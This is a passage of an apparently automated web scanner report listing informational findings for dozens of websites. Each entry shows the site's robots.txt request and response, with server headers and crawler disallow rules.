Last-Modified: Sat, 30 Apr 2011 07:32:26 GMT
Accept-Ranges: bytes
ETag: "16ceebc087cc1:632"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 01:57:39 GMT
Connection: close

User-agent: *
Disallow: /

27.725. http://www.grannycream.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.grannycream.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.grannycream.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:44:11 GMT
Server: Apache
Last-Modified: Fri, 19 Mar 2010 22:54:06 GMT
ETag: "35ba92b-84-4822f3976bf80"
Accept-Ranges: bytes
Content-Length: 132
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /cgi-bin/
Disallow: /st/
Disallow: /toplists/
Disallow: /st/st.php
Disallow: /tube/
Disallow: /tube/movies/

27.726. http://www.graphicsfactory.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.graphicsfactory.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.graphicsfactory.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:56:27 GMT
Server: Apache
Last-Modified: Fri, 23 Nov 2007 04:18:27 GMT
Accept-Ranges: bytes
Content-Length: 28
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

User-agent: Wget
Disallow: /

27.727. http://www.greatsites4all.co.uk/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.greatsites4all.co.uk
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.greatsites4all.co.uk

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:26:37 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Wed, 11 Nov 2009 07:51:54 GMT
ETag: "25f84e5-19-47813b341fa80"
Accept-Ranges: bytes
Content-Length: 25
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /

27.728. http://www.greenbankusa.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.greenbankusa.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.greenbankusa.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Fri, 21 May 2010 21:41:37 GMT
Accept-Ranges: bytes
ETag: "807eb3632ef9ca1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 03:34:11 GMT
Connection: close
Content-Length: 27

User-agent: *
Allow: /


27.729. http://www.greenlightsaver1.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.greenlightsaver1.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.greenlightsaver1.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 04:14:17 GMT
Server: Apache
Last-Modified: Thu, 23 Apr 2009 05:09:16 GMT
ETag: "240fcb0-88-46831e1b0f700"
Accept-Ranges: bytes
Content-Length: 136
Connection: close
Content-Type: text/plain; charset=UTF-8

User-Agent: *
Disallow: /cpx.php
Disallow: /medios1.php
Disallow: /toolbar.php
Disallow: /check_image.php
Disallow: /check_popunder.php

27.730. http://www.greenoptions.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.greenoptions.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.greenoptions.com

Response

HTTP/1.1 200 OK
Server: nginx/0.7.65
Date: Wed, 04 May 2011 01:39:42 GMT
Content-Type: text/plain;charset=utf-8
Connection: close
X-Powered-By: PHP/5.2.13
Content-Length: 145
X-Varnish: 969691974
Age: 0
Via: 1.1 varnish
X-Served-By: varnish002.huddler.com
X-Cache: MISS
P3P: policyref="http://www.huddler.com/w3c/p3p.xml", CP="NOI DSP COR CURa ADMa DEVa TAIa OUR BUS IND UNI COM NAV INT"

User-agent: *
Disallow: /apis/
Disallow: /-api-
Disallow: /search.php
Disallow: /p.php
Sitemap: http://www.greenoptions.com/site_map_index.xml.gz

27.731. http://www.greentreepayday.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.greentreepayday.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.greentreepayday.com

Response

HTTP/1.0 200 OK
Server: Resin/3.1.8
ETag: "48amZzUhAwU"
Last-Modified: Tue, 20 Apr 2010 22:37:06 GMT
Accept-Ranges: bytes
Content-Type: text/plain
Content-Length: 112
Date: Wed, 04 May 2011 03:36:08 GMT
Connection: close
Set-Cookie: epersist=2yQy0J2M6AnaNtek0jcBLxoBfj8+J+3AuL9bt13Q9l3gPtr8CVgwTz//rCQlocsVAhmlhJYNqmEf; path=/

# All robots will spider the domain

User-agent: *
Disallow:
Sitemap: http://www.simplyfinance.co.uk/sitemap.xml

27.732. http://www.greenvalleyranchresort.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.greenvalleyranchresort.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.greenvalleyranchresort.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:36:14 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Sun, 23 Aug 2009 23:22:43 GMT
ETag: "410a94e-207-60d016c0"
Accept-Ranges: bytes
Content-Length: 519
Connection: close
Content-Type: text/plain

Sitemap: http://www.greenvalleyranchresort.com/sitemap.xml

User-agent: *
Disallow: /a3/
Disallow: /challenge/
Disallow: /css/
Disallow: /dev/
Disallow: /downloads/
Disallow: /e/
Disallow: /flash/
Dis
...[SNIP]...

27.733. http://www.grocerycouponguide.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.grocerycouponguide.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.grocerycouponguide.com

Response

HTTP/1.0 200 OK
Date: Wed, 04 May 2011 01:07:57 GMT
Server: Apache
X-Powered-By: W3 Total Cache/0.9.1.3
Set-Cookie: wp_ozh_wsa_visits=1; expires=Thu, 03-May-2012 01:07:57 GMT; path=/
Set-Cookie: wp_ozh_wsa_visit_lasttime=1304471277; expires=Thu, 03-May-2012 01:07:57 GMT; path=/
X-Pingback: http://www.grocerycouponguide.com/xmlrpc.php
Vary: User-Agent,Accept-Encoding
Content-Length: 24
Connection: close
Content-Type: text/plain; charset=utf-8

User-agent: *
Disallow:

27.734. http://www.grocerysmarts.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.grocerysmarts.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.grocerysmarts.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:38:48 GMT
Server: Apache
Last-Modified: Thu, 24 Apr 2008 09:46:57 GMT
Accept-Ranges: bytes
Content-Length: 86
Connection: close
Content-Type: text/plain

# Created By SubmitCorner - www.submitcorner.com
User-Agent: *
Disallow: /cgi-bin/

27.735. http://www.grubhub.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.grubhub.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.grubhub.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:34:06 GMT
Server: Apache
Set-Cookie: JSESSIONID=AE32035C64F67BA8C23CA21E8877AD28.worker1; Path=/
ETag: W/"839-1304107112000"
Last-Modified: Fri, 29 Apr 2011 19:58:32 GMT
Content-Length: 839
Cache-Control: max-age=0
Expires: Wed, 04 May 2011 03:34:06 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent:twiceler
Disallow: /

User-agent:BecomeBot
Disallow: /

User-agent:ShopWiki
Disallow: /

# Yandex: Russian search engine
User-agent:Yandex
Disallow: /

User-agent:YandexSomething
Disallow:
...[SNIP]...

27.736. http://www.guidestobuy.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.guidestobuy.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.guidestobuy.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:13:14 GMT
Server: Apache/2.2.15 (Unix) mod_ssl/2.2.15 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.2.13
X-Pingback: http://guidestobuy.com/xmlrpc.php
Connection: close
Content-Type: text/plain; charset=utf-8

User-agent: *
Disallow:

Sitemap: http://guidestobuy.com/sitemap.xml.gz

27.737. http://www.guitarscanada.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.guitarscanada.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.guitarscanada.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:38:28 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_perl/2.0.4 Perl/v5.8.8
Last-Modified: Sat, 29 Jan 2011 17:51:12 GMT
ETag: "48c8001-27a-49affd4100400"
Accept-Ranges: bytes
Content-Length: 634
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /announcement.php
Disallow: /calendar.php
Disallow: /cron.php
Disallow: /editpost.php
Disallow: /faq.php
Disallow: /joinrequests.php
Disallow: /login.php
Disallow: /member.php

...[SNIP]...

27.738. http://www.gymjox.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gymjox.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.gymjox.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 00:42:13 GMT
Server: Apache
X-Powered-By: PHP/5.2.15
X-Pingback: http://www.gymjox.com/xmlrpc.php
Set-Cookie: bp-message=deleted; expires=Tue, 04-May-2010 00:42:13 GMT; path=/
Set-Cookie: bp-message-type=deleted; expires=Tue, 04-May-2010 00:42:13 GMT; path=/
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain; charset=utf-8

User-agent: *
Disallow:

Sitemap: http://www.gymjox.com/sitemap.xml.gz

27.739. http://www.hairsisters.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hairsisters.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.hairsisters.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:31:40 GMT
Server: Apache/1.3.37 (Unix) mod_tsunami/3.0 FrontPage/5.0.2.2634
Last-Modified: Mon, 02 May 2011 15:29:27 GMT
ETag: "cc0181-6a-4dbecdd7"
Accept-Ranges: bytes
Content-Length: 106
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /analyzer/
Disallow: /Madmin/
Sitemap:http://www.hairsisters.com.com/sitemap.xml

27.740. http://www.hairstyles.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hairstyles.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.hairstyles.com

Response

HTTP/1.0 200 OK
Vary: Accept-Encoding
Content-Type: text/plain
Accept-Ranges: bytes
ETag: "1635438706"
Last-Modified: Tue, 03 May 2011 19:15:58 GMT
Content-Length: 215
Date: Wed, 04 May 2011 03:23:59 GMT
Server: lighttpd

User-agent: *
Disallow: /
Disallow: /sear
Disallow: /imag
Disallow: /redirect.php
Disallow: /site-php/
Disallow: /kwpop.php
Disallow: /uniques.php
Disallow: /contact.php
Disallow: /offer.php
Disallow:
...[SNIP]...

27.741. http://www.halloween-website.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.halloween-website.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.halloween-website.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:57:04 GMT
Server: Apache mod_fcgid/2.3.6 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Wed, 06 Oct 2010 14:03:57 GMT
ETag: "65f4127-84-491f33f9a4d40"
Accept-Ranges: bytes
Content-Length: 132
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /cgi-bin/

User-agent: aipbot
Disallow: /

User-agent: SBIder
Disallow: /

User-agent: IncyWincy
Disallow: /

27.742. http://www.halolz.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.halolz.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.halolz.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:26:10 GMT
Server: Apache
X-Powered-By: PHP/5.2.17
X-Pingback: http://www.halolz.com/xmlrpc.php
Connection: close
Content-Type: text/plain; charset=utf-8

User-agent: *
Disallow:

Sitemap: http://www.halolz.com/sitemap.xml.gz

27.743. http://www.hamptons.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hamptons.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.hamptons.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:35:27 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Wed, 15 Dec 2010 19:40:18 GMT
ETag: "9a08bb-19-1b602c80"
Accept-Ranges: bytes
Content-Length: 25
Connection: close
Content-Type: text/plain; charset=ISO-8859-1

User-agent: *
Disallow:

27.744. http://www.hanfordsentinel.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hanfordsentinel.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.hanfordsentinel.com

Response

HTTP/1.1 200 OK
Server: WWW
Vary: Accept-Encoding
Cache-Control: public, max-age=900
X-TNCMS-Memory-Usage: 2078128
Content-Type: text/plain; charset=UTF-8
X-TNCMS-Venue: app
Date: Wed, 04 May 2011 03:56:59 GMT
X-TN-ServedBy: cms.app.80
X-Loop: 1
X-TNCMS-Version: 1.7.9
X-TNCMS-Render-Time: 0.0437
Accept-Ranges: bytes
X-PHP-Engine: enabled
Connection: close
Set-Cookie: TNNoMobile=1; path=/; expires=Thu, 2 Aug 2031 20:47:11 UTC
X-Cache-Info: caching
Real-Hostname: hanfordsentinel.com
X-TNCMS-Served-By: cmsapp13
Content-Length: 1558

User-agent: MSNBot
Crawl-delay: 3
Disallow: /content/tncms/live/
Disallow: /content/tncms/ads/
Disallow: /*?mode=print
Disallow: /*?print
Disallow: /*?mode=story
Disallow: /*?mode=comments

U
...[SNIP]...

27.745. http://www.hankooki.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hankooki.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.hankooki.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:13:50 GMT
Server: Apache
Last-Modified: Sat, 02 Feb 2008 10:06:04 GMT
ETag: "147-4452a09e8a417"
Accept-Ranges: bytes
Content-Length: 327
Content-Type: text/plain
Via: 1.1 Cache3 (Jaguar/3.0-11)
Age: 4137
Connection: close

# robots
User-agent: *
Disallow:/ad
Disallow:/adflash
Disallow:/adinfo
Disallow:/adinfo2
Disallow:/adscript
Disallow:/adman
Disallow:/banner
Disallow:/_cal
Disallow:/__vpn
Disallow:/community
Disallow
...[SNIP]...

27.746. http://www.hannahmontanagamesonline.net/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hannahmontanagamesonline.net
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.hannahmontanagamesonline.net

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 04:07:54 GMT
Server: Apache/2.2.17 (Unix) mod_ssl/2.2.17 OpenSSL/0.9.8e-fips-rhel5 mod_bwlimited/1.4
Last-Modified: Mon, 22 Feb 2010 06:43:42 GMT
ETag: "18202d2-20-4802ac102a380"
Accept-Ranges: bytes
Content-Length: 32
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /cgi-bin

27.747. http://www.hannibal.net/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hannibal.net
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.hannibal.net

Response

HTTP/1.0 200 OK
Date: Wed, 04 May 2011 00:33:21 GMT
Server: zope.server.http (WSGI-HTTP)
X-Powered-By: Zope (www.zope.org), Python (www.python.org)
Content-Length: 167
Content-Type: text/plain;charset=utf-8
X-Cache: HIT from parent2.ghm.zope.net
Age: 648
X-Cache: HIT from cache5.ghm.zope.net
Via: 1.0 parent2.ghm.zope.net:80 (squid/2.7.STABLE9), 1.0 cache5.ghm.zope.net:80 (squid)
Connection: close


User-agent: Topix.net
Disallow: /
User-agent: *
Disallow: /mi-holland
User-agent: *
Disallow: /*?view
User-agent: *
Disallow: /!/
User-agent: *
Disallow: /promotions

27.748. http://www.happypublishing.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.happypublishing.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.happypublishing.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:30:17 GMT
Server: Apache mod_fcgid/2.3.6 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Wed, 04 May 2011 02:59:01 GMT
Accept-Ranges: bytes
Content-Length: 207
Vary: Accept-Encoding,User-Agent
X-Powered-By: W3 Total Cache/0.9.1.3
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /cdn-cgi/async/cf/uri/
Disallow: /quoteforum/
Disallow: /quotes.htm
Disallow: /wyrlessweb/
Disallow: /webring/

User-agent: ia_archiver
Disallow: /

User-agent: duggmirror
Disa
...[SNIP]...

27.749. http://www.happyvagabonds.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.happyvagabonds.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.happyvagabonds.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:05:23 GMT
Server: Apache mod_fcgid/2.3.6 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
Last-Modified: Sun, 06 Feb 2011 07:06:20 GMT
ETag: "94e0026-1a-49b97c091f300"
Accept-Ranges: bytes
Content-Length: 26
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:

27.750. http://www.harborone.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.harborone.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.harborone.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 00:58:28 GMT
Server: Apache
Last-Modified: Tue, 07 Dec 2010 20:42:24 GMT
ETag: "d407a2-368-496d80abb6c00"
Accept-Ranges: bytes
Content-Length: 872
Cache-Control: max-age=1800
Expires: Wed, 04 May 2011 01:28:28 GMT
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /wp-admin/
Disallow: /wp-content/wp-plugins/
Disallow: /wp-content/media/
Disallow: /wp-content/gallery/
Disallow: /borrowing/
Disallow: /banking/
Disallow: /other_resou
...[SNIP]...

27.751. http://www.hartzultraguard.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hartzultraguard.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.hartzultraguard.com

Response

HTTP/1.1 200 OK
Cache-Control: max-age=604800
Content-Length: 70
Content-Type: text/plain
Last-Modified: Wed, 25 Aug 2010 19:16:10 GMT
Accept-Ranges: bytes
ETag: "f4fa25fa8944cb1:62bd"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Wed, 04 May 2011 01:33:54 GMT
Connection: close

User-agent: *
Disallow: /sitecore/
Disallow: /Home/
Disallow: /HUG/

27.752. http://www.haventoday.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.haventoday.org
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.haventoday.org

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 04:06:36 GMT
Server: NOYB
Vary: *
Last-Modified: Fri, 06 Feb 2009 23:21:18 GMT
ETag: "c3883e7a1fe858c6dc7cd7671ddba36b38122806"
Accept-Ranges: bytes
Content-Length: 53
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /audio/
Disallow: /playlist/

27.753. http://www.hayneedleoutlet.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hayneedleoutlet.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.hayneedleoutlet.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:38:37 GMT
Server: Apache
Cache-Control: max-age=864000
Expires: Sat, 14 May 2011 02:38:37 GMT
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /cart/
Disallow: /templates/
Disallow: /info/
Disallow: /shared/
Disallow: /checkout/
Disallow: /account/
Disallow: /js/
Disallow: /pp_Print.cfm?
Disallow: /pp_print.c
...[SNIP]...

27.754. http://www.hcgcompletediet.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hcgcompletediet.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.hcgcompletediet.com

Response

HTTP/1.1 200 OK
Server: nginx
Date: Wed, 04 May 2011 02:45:23 GMT
Content-Type: text/plain
Connection: close
Last-Modified: Mon, 01 Feb 2010 02:30:13 GMT
ETag: "185-47e80c3d0d740"
Accept-Ranges: bytes
Content-Length: 389
Vary: Accept-Encoding

User-agent: *
Disallow: /account.php
Disallow: /cart.php
Disallow: /checkout.php
Disallow: /finishorder.php
Disallow: /login.php
Disallow: /orderstatus.php
Disallow: /postreview.php
Disallow: /product
...[SNIP]...

27.755. http://www.hcgdietdirect.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hcgdietdirect.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.hcgdietdirect.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:19:49 GMT
Server: Apache
Last-Modified: Thu, 21 Apr 2011 19:31:32 GMT
Accept-Ranges: bytes
Content-Length: 237
Connection: close
Content-Type: text/plain

# added slash after secure 071610 - MLevy
# added /2.6 for Strangeloop JS showing in WTools 092810 - MLevy
User-agent: *
Disallow: /secure/
Disallow: /2.6
Disallow: /flash
Allow: /
Sitemap: http://www
...[SNIP]...

27.756. http://www.hd.net/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hd.net
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.hd.net

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 02:47:24 GMT
Server: Apache
Last-Modified: Thu, 31 Mar 2011 22:35:39 GMT
ETag: "36-49fcee9a7a4c0"
Accept-Ranges: bytes
Content-Length: 54
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

User-Agent: *
Disallow: /wp-*
Disallow: /engineering/

27.757. http://www.hdnubiles.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hdnubiles.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.hdnubiles.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 01:58:46 GMT
Server: Apache
Last-Modified: Sat, 08 May 2010 19:59:47 GMT
ETag: "a875001-49-4be5c2b3"
Accept-Ranges: bytes
Content-Length: 73
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /members/
Disallow: /mobile/
Disallow: /promo/

27.758. http://www.health.am/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.health.am
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.health.am

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:19:03 GMT
Server: Apache/1.3.41 (Unix) PHP/4.4.9 mod_auth_passthrough/1.8 mod_log_bytes/1.2 mod_bwlimited/1.4 FrontPage/5.0.2.2635 mod_ssl/2.8.31 OpenSSL/0.9.7a
Last-Modified: Wed, 04 Nov 2009 22:06:17 GMT
ETag: "5d67bba-273-4af1fad9"
Accept-Ranges: bytes
Content-Length: 627
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /aaa/
Disallow: /admin/
Disallow: /psychiatry/
Disallow: /backk/
Disallow: /cache/
Disallow: /im/
Disallow: /images/
Disallow: /inc/
Disallow: /i/
Disallow: /inc_rus/
Disallow:
...[SNIP]...

27.759. http://www.healthdigest.org/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.healthdigest.org
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.healthdigest.org

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:56:35 GMT
Server: Apache
Last-Modified: Wed, 10 Feb 2010 21:32:10 GMT
ETag: "72b068f-40-47f45c451aa80"
Accept-Ranges: bytes
Content-Length: 64
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /goto/
Disallow: /insurance-quotes.htm

27.760. http://www.healthiertalk.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.healthiertalk.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.healthiertalk.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:40:28 GMT
Server: Apache/2.2.3 (CentOS)
Last-Modified: Tue, 25 May 2010 07:30:52 GMT
ETag: "4570020-651-4876623178300"
Accept-Ranges: bytes
Content-Length: 1617
Cache-Control: max-age=1209600
Expires: Wed, 18 May 2011 03:40:28 GMT
Connection: close
Content-Type: text/plain; charset=utf-8

# $Id: robots.txt,v 1.9.2.1 2008/12/10 20:12:19 goba Exp $
#
# robots.txt
#
# This file is to prevent the crawling and indexing of certain parts
# of your site by web crawlers and spiders run by sites
...[SNIP]...

27.761. http://www.healthy-recipes-for-kids.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.healthy-recipes-for-kids.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.healthy-recipes-for-kids.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:46:00 GMT
Server: Apache
Cache-Control: no-cache, no-store
Connection: close
Content-Type: text/plain; charset=ISO-8859-1

Sitemap: http://www.healthy-recipes-for-kids.com/wUTNGhCI.xml

User-agent: Googlebot
Disallow: /dyn/
Disallow: /objects/
Crawl-delay: 30

User-agent: bingbot
Disallow: /cgi-bin/
Disallow: /bin/
Disall
...[SNIP]...

27.762. http://www.hear-there.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hear-there.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.hear-there.com

Response

HTTP/1.1 200 OK
Set-Cookie: JSESSIONID=728FCCFA58BA91143E806BF9F22A4191.web110; Path=/; HttpOnly
X-ServedBy: web110
Content-Type: text/plain
Date: Wed, 04 May 2011 03:48:53 GMT
Connection: close
Server: SSWS
Set-Cookie: BIGipServerWebServers=1845602496.20480.0000; path=/
Vary: Accept-Encoding, User-Agent

# Squarespace Standard Robot Exclusion
# Access is disallowed to functional / filtering URLs

User-agent: *
Disallow: /display/Search
Disallow: /display/Login
Disallow: /display/RecoverPassword
Disall
...[SNIP]...

27.763. http://www.hearos.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.hearos.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.hearos.com

Response

HTTP/1.1 200 OK
Date: Wed, 04 May 2011 03:13:16 GMT
Server: Apache
Last-Modified: Sun, 23 May 2010 06:09:33 GMT
Accept-Ranges: bytes
